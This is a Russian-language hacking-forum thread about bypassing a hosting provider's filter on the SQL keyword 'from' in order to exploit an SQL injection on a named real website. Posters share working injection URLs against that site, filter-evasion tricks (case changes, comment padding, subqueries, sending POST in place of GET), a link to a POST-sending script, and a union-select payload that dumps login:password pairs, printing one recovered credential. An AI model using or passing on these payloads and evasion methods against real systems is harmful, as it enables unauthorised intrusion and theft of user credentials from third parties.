![]() |
обход фильтрации запрещённых слов в MySql
Капался на просторах интернета и наткнулся на скул. Инъекция, как инъекция, даже ковычки не экранируются, но вот косяк, что фильтруется слово from. Ну и стал думать, как можно обойти фильтрацию. Долго не думал, потому что нечто подобное уже делали с пхп. Надо как-то зашифровать и потом расшифровать строку. Чем я и занялся. Покопался на разных ресурсах по MySQL и нашел несколько функций кодировки/декодировки строк. Начал экспериментировать. На моё удивление получилось следующее:
при подстановке PHP код:
PHP код:
Поэкпериментировав на локальном серве денвера получил следующее PHP код:
|
ну если фильтруется from, то вариант это использование подзапросов, далее надо поэксперементировать как именно фильтруется from, может быть фильтруется только в нижнем регистре, тогда можно попробовать FROM, иногда бывает фильтрация и верхний и нижний регистр фильтруется (как не странно видел один раз такое не с FROM конечно, но это не важно, тупость остается тупостью, конечно легче перевести $_REQUEST в нижний регистр и проверить на from, но фиг знает что употреблял кодер, на момент написания скрипта), тогда можно FrOm попробовать. from может фильтроваться с пробелом напимер " From" или "from ", тогда пробелы можно заменить на /**/ например так :
Цитата:
Цитата:
Цитата:
|
Фильтруется from в любом известном проявлении в GET запросе, даже в случае "-1+union+select+'from'+/*" ... А про декрипт/инкрипт уже сам допёр. Но к сожалению это очень врядли можно использовать чтобы обойти эту фильтрацию...ибо user(), как я узнал, является в мускуле лишь строковой переменной, а если криптовать/декриптовать 'from' то вместо того, что нужно получится лишь ошибка :(
Да собственно вот ссылка, мне уже просто интересно, кто-ибудь обойдёт фильтрацию!? Отпишитесь тут плз...оч прошу. www.internatura.ru/index.php?op=cat&sec=4&gn=-1+union+select+user()+/* |
фильтруется только гет запрос, щас проверил, через пост всёнормально отправляется
Юзай Post =) ЗЫ Это sweb хостинг, его защита легко обходится заменив GET запрос на POST Тут на форуме есть скрипт от Мэднета, вот залил что бы не искать http://ziroday.narod.ru/post.php |
Вот не фильтруется нифига:
http://www.internatura.ru/index.php?op=cat&sec=24&gn=5785+order+by+1/*from*//* у меня плохо работающий жопорез, поэтому раскрутить не получится, а вобще это показывает, что from не фильтруется |
Scipio, ты не совсем прав
Например http://www.internatura.ru/index.php?op=cat&sec=24&gn=5785+order+by+from/* тоже не фильтруется, но при www.internatura.ru/index.php?op=cat&sec=4&gn=-1+union+select+user()+from+mda/* перекидывает на sweb, это их знаменитая хэк защита, которая (как я написал выше) обходится отправиь запрос методом пост |
Довольно интересно...))
Запрос откидывается, если в запросе (масло маслянное) присутствуют Union, Select, From, именно в такой последовательности... Тут думаю или пост, или пробовать подзапросы |
Цитата:
|
Да йопт, чё пробовать то))) Пост работает, сам проверял
Кстати там ещё фильтруется слово /etc/passwd :D Вобщем вот http://www.internatura.ru/index.php?op=cat&sec=4&gn=-1+union+select+concat_ws(':',login,password)+from+ users/* viktor:1940 |
Spyder, прсто respect!!! Пост запросом имхо лучше через inetcrack пользоваться :) Скопировал хеад от гета, заменил метод и чуть подправил :)
|
| Время: 22:48 |